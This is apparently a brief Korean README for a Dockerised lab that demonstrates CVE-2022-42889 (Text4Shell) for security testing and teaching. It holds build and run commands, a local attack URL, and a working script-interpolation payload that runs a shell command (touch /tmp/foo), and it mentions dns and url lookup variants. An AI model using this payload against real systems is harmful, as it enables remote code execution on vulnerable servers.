
CVE-2022-42889(Text4Shell)용 Docker화된 개념 증명으로, 스크립트, DNS 및 URL 조회 기반 RCE 페이로드를 포함한 보안 테스트 및 교육용입니다.
mvn clean install
docker build --tag=text4shell .
docker run -p 80:8080 text4shell
http://localhost/text4shell/attack?search=<anything>
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
dns 또는 url 접두어를 사용해 볼 수도 있습니다.
컨테이너 ID 가져오기
docker container ls
docker exec -it <container_id> bash
/tmp 디렉토리에 foo라는 파일이 생성되어 있어야 합니다):ls /tmp/
docker container stop <container_id>